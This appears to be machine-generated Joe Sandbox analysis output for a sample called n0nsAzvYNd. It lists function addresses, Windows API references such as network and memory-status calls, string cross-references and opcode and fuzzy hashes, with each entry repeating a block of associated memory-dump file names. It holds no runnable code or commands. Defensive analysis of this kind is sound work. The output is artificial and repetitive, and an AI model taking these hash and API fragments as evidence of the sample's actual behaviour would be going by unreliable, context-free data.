Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: aa4e0939b74f4af43269669785d8abc9e7e14f604d904c05890b6206138b9301
Instruction ID: b6982310d5a4a08faa2d33171f7013a2e9525ff182efafec516cd1f1adca89a4
Opcode Fuzzy Hash: aa4e0939b74f4af43269669785d8abc9e7e14f604d904c05890b6206138b9301
Instruction Fuzzy Hash: 86E08636711211DBD7306FB05D0CF567BBCEF557D1F954838B685C9040DA35844AC764

Function 003A6240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%C, xrefs: 003A624E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID: %C
API String ID: 0-3809956945
Opcode ID: 15a464487d5f9b20e93f18713893c31407304490f70220755b89137e10fab66b
Instruction ID: 00df9ec04afe30ccdabb352ec9a4864c1b6fc6594bf2513d948dcb9711359eee
Opcode Fuzzy Hash: 15a464487d5f9b20e93f18713893c31407304490f70220755b89137e10fab66b
Instruction Fuzzy Hash: 95B1E575C00109DBCF16EF94C8869FEBBB9FF5A310F194126E502AB291DB359E82CB51

Function 0041AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0041AFAE

Strings

xbF, xrefs: 0041B010
xbF, xrefs: 0041AFE4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __itow_s
String ID: xbF$xbF
API String ID: 3653519197-1839378059
Opcode ID: e26e3e13c3367516fc9f97e1a135abe0857c0f07ed05f5ce94830772d1363724
Instruction ID: 86a944dbf8d3326bf9929c4c3f9ddd1860960d91a46b522971032e7fae0d196d
Opcode Fuzzy Hash: e26e3e13c3367516fc9f97e1a135abe0857c0f07ed05f5ce94830772d1363724
Instruction Fuzzy Hash: A9B18070A00209EFCB14DF54C891EFABBB9FF59340F14846AF9459B291EB34D985CB94

Function 0040AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 003BFC86: _wcscpy.LIBCMT ref: 003BFCA9

Part of subcall function 003A9837: __itow.LIBCMT ref: 003A9862
Part of subcall function 003A9837: __swprintf.LIBCMT ref: 003A98AC

__wcsnicmp.LIBCMT ref: 0040B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0040B0F6

Strings

LPT, xrefs: 0040B027

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 34c46d4e4bfca63020aae00dbce8def7495d5461c4f99e2766540be6eb5b0e3c
Instruction ID: c668743103fb39c3a3bffad678901b96c1e3acdbbcb8f3810b025fdae6863766
Opcode Fuzzy Hash: 34c46d4e4bfca63020aae00dbce8def7495d5461c4f99e2766540be6eb5b0e3c
Instruction Fuzzy Hash: 8D618C71A00219AFCB15DF94C891EAFB7B4EB09350F10406AF916BB391D734AE41CB99

Function 003B2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 003B2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 003B2981

Strings

@, xrefs: 003B2975

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2f6269b4308e764d46720aec87206b4215496ad1fa7d47e3d746c752775a8266
Instruction ID: 065ce1b2058f7d98a9fa8ae70639fb418e69c25afcbd600f8653c91a22dbb2f8
Opcode Fuzzy Hash: 2f6269b4308e764d46720aec87206b4215496ad1fa7d47e3d746c752775a8266
Instruction Fuzzy Hash: A0514871418744ABE321EF10D886BAFBBE8FF86344F81885DF2D8550A1DB358529CB66

Function 00409734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 003A4F0B: __fread_nolock.LIBCMT ref: 003A4F29

_wcscmp.LIBCMT ref: 00409824
_wcscmp.LIBCMT ref: 00409837

Strings

FILE, xrefs: 00409770

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 34cebfd0f5e746774adafbd37b76149344f3778b1cfa7c51186f911c1a7a54a0
Instruction ID: b71d2a171c2f69c19dc76633493ae05ba8a09cd8318557551fe0d4b79a9bff6c
Opcode Fuzzy Hash: 34cebfd0f5e746774adafbd37b76149344f3778b1cfa7c51186f911c1a7a54a0
Instruction Fuzzy Hash: 2741A972A00219BADF21AAA1CC45FEFB7B9DF86710F00447AF904FB281DA759D058B65

Function 003E0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003E057F

Strings

DdF, xrefs: 003AA317
DdF, xrefs: 003AA151

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClearVariant
String ID: DdF$DdF
API String ID: 1473721057-2937272770
Opcode ID: 7c7c78673472c03d90416246ec519caf167490a00449947b67bf049168ff8612
Instruction ID: 2d821a5c3adf25d30b6a2667cb56727e8eff41eeb23c22704db17919fe87c6e0
Opcode Fuzzy Hash: 7c7c78673472c03d90416246ec519caf167490a00449947b67bf049168ff8612
Instruction Fuzzy Hash: 6C5122796087429FD756CF19C480A1ABBF1FB9A344F55886DE8858B360E771EC81CF82

Function 0041258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004125D4

Strings

|, xrefs: 004125A5

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 9c93b5b51722908a680fdd1a127c1d9f404ed5bc01c3fae4038ffd7fe9f51ff6
Instruction ID: 854889ea05f3440e7d6a36f488969356b0f7bf52bd2f75b9b895945cc681d807
Opcode Fuzzy Hash: 9c93b5b51722908a680fdd1a127c1d9f404ed5bc01c3fae4038ffd7fe9f51ff6
Instruction Fuzzy Hash: 34310A71800119EBCF12EFA0CC85EEEBFB9FF19350F10006AF955AA162EB355956DB60

Function 00427A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00427B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00427B76

Strings

', xrefs: 00427ACA

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 075057177f7a929618a06ab6266a0697cb1191dc19cf3eb5f747ff0e3a52f51f
Instruction ID: 6991c6c3b3d02e8164246bd2b327d465f1a6f8291df7b9ec66653642d434778c
Opcode Fuzzy Hash: 075057177f7a929618a06ab6266a0697cb1191dc19cf3eb5f747ff0e3a52f51f
Instruction Fuzzy Hash: 58413974B0521A9FDB14CF64D880BDABBB5FF08314F50016AE904EB341E774A951CF98

Function 00426A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00426B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00426B53

Strings

static, xrefs: 00426AB3

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 4eb1ea3adfdb29c0f3450c41d533860d63400b6e49e75c08fd2efcc2e54c9dd7
Instruction ID: 37115bac17cb5e9c9a666bd6865a6ec533df7ce29dba3a72987c748bbb4947b8
Opcode Fuzzy Hash: 4eb1ea3adfdb29c0f3450c41d533860d63400b6e49e75c08fd2efcc2e54c9dd7
Instruction Fuzzy Hash: 1131AF71200214AEDB109F68DC80BFB77B9FF49760F91852EF9A5D7190DA34AC81CB68

Function 004028A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00402911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0040294C

Strings

0, xrefs: 0040290A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: cfe286214a722a359a62992af9cf6b794b743e45b522b48c89f5b0429d91ea77
Instruction ID: 8fe05e1eee3003ce495ee3590ed91f117b67b54d180dcd25fae76982bcfd6e34
Opcode Fuzzy Hash: cfe286214a722a359a62992af9cf6b794b743e45b522b48c89f5b0429d91ea77
Instruction Fuzzy Hash: 2631E571700305ABDB25DF58CA49BAFBBB8EF05350F14003AE885B62E0D7F89940CB59

Function 004266D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00426761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0042676C

Strings

Combobox, xrefs: 0042672E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 4ad8db8357420a5b071ea397f125d1cd1aca812b8ede3f73b4ebb39edbf129c8
Instruction ID: b8d18318410f25b071f7bf641f1957bf03fb9e56cd835d1bb83359b95c961d61
Opcode Fuzzy Hash: 4ad8db8357420a5b071ea397f125d1cd1aca812b8ede3f73b4ebb39edbf129c8
Instruction Fuzzy Hash: B011C475300218BFEF21DF54EC80EBB376AEB88368F51012AF9189B390D679DC5197A4

Function 00426C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 003A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003A1D73
Part of subcall function 003A1D35: GetStockObject.GDI32(00000011), ref: 003A1D87
Part of subcall function 003A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003A1D91

GetWindowRect.USER32(00000000,?), ref: 00426C71
GetSysColor.USER32(00000012), ref: 00426C8B

Strings

static, xrefs: 00426C4E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 220dba61e7abcda46b4cebe99943f68f0e121db4cdf4a5430cbb3e61bea3facf
Instruction ID: e4bfa9b78e602c42c376267b49868d6ee1c1141bde217af3fefa1005596ba3d1
Opcode Fuzzy Hash: 220dba61e7abcda46b4cebe99943f68f0e121db4cdf4a5430cbb3e61bea3facf
Instruction Fuzzy Hash: EE21647261021AAFDB04DFA8DC45AEA7BB8FB08304F414629F995D2240E638E8519B64

Function 00426920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 004269A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004269B1

Strings

edit, xrefs: 00426986

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 9fd6b3f4d7644f47cfa96b8d517b5df193762dbce6524d8b0310ab99b657e7a5
Instruction ID: aedecd8eae8e9272fa644df0cee599c10f747aefb9e70324b0956a6960896fce
Opcode Fuzzy Hash: 9fd6b3f4d7644f47cfa96b8d517b5df193762dbce6524d8b0310ab99b657e7a5
Instruction Fuzzy Hash: EF119DB1200124ABEB108F64AC40EAB3769EB05378F914725F9A0962E0CB79DC9597A8

Function 004029AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00402A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00402A41

Strings

0, xrefs: 00402A18

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 1de3abacc23797d4ba8193eb2f11464473d6c3fc795bf2118756f02dff35e680
Instruction ID: d46ad8e291559b4ea58363605edcd45d075161d005fd82b2ba0d57441472a07b
Opcode Fuzzy Hash: 1de3abacc23797d4ba8193eb2f11464473d6c3fc795bf2118756f02dff35e680
Instruction Fuzzy Hash: 4011B472A01125AACF30EA98DA48B9B73A8AB45340F144072E855F72D0DBB4AD06CB99

Function 004121D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0041222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00412255

Strings

<local>, xrefs: 0041221D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 2f4643c66f848238eb4fa22dabfee366e7ae816a764d8de8f951f18c1c7ff64a
Instruction ID: 9d3512791d22b3c2771d213b6f1e20561a6a7e92f17edf846e82724359287fe5
Opcode Fuzzy Hash: 2f4643c66f848238eb4fa22dabfee366e7ae816a764d8de8f951f18c1c7ff64a
Instruction Fuzzy Hash: E811E070601225BADB258F518D84EFBFBA8FF06351F10826BF90496100E2B458E6D6F5

Function 003B092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003A3C14,004652F8,?,?,?), ref: 003B096E

Part of subcall function 003A7BCC: _memmove.LIBCMT ref: 003A7C06

_wcscat.LIBCMT ref: 003E4CB7

Strings

SF, xrefs: 003B09AE

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID: SF
API String ID: 257928180-3927473838
Opcode ID: 614b3d4ea14ca0da02634cc9e98bb51ff834a15e597e79607091f54b87ac64fc
Instruction ID: 36f9956f5c8f4c1acb1820c4baf73bebdc74db4473a13e17c99199b963d41666
Opcode Fuzzy Hash: 614b3d4ea14ca0da02634cc9e98bb51ff834a15e597e79607091f54b87ac64fc
Instruction Fuzzy Hash: 59110871A05208ABCB12FBA4CC46ECE73F8EF09784F0040A6FA45DB291EFB097844715

Function 003F8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003FAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003F8E73

Strings

ListBox, xrefs: 003F8E3D
ComboBox, xrefs: 003F8E12

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 14a749ae20febab41d440689a1470d83fe682e731f440d063377c0da915d73bc
Instruction ID: b833d2c6098dd8a7241a1e92bafd8cb0ef7f3ce6446c29b796a551793b61cd06
Opcode Fuzzy Hash: 14a749ae20febab41d440689a1470d83fe682e731f440d063377c0da915d73bc
Instruction Fuzzy Hash: 3401F1B1605218AB8F1AEBA0CC459FE7368EF16320B500A29F9255B2E2DF35580CC650

Function 003F8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003A7DE1: _memmove.LIBCMT ref: 003A7E22

Part of subcall function 003FAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003FAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 003F8D6B

Strings

ListBox, xrefs: 003F8D35
ComboBox, xrefs: 003F8D0A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 7f17b43e5cda3c2d902897a4d3233163e7765bb78b2f8893854d75e7010509f0
Instruction ID: 123aefc1096e63d3ae8c90df922fd241c2700d3719f88b117e353f46032d8465
Opcode Fuzzy Hash: 7f17b43e5cda3c2d902897a4d3233163e7765bb78b2f8893854d75e7010509f0
Instruction Fuzzy Hash: D101B1B1A4110CABCB1AEBA0C952AFE77A8DF16300F500029B9056B292DE145A0C9261

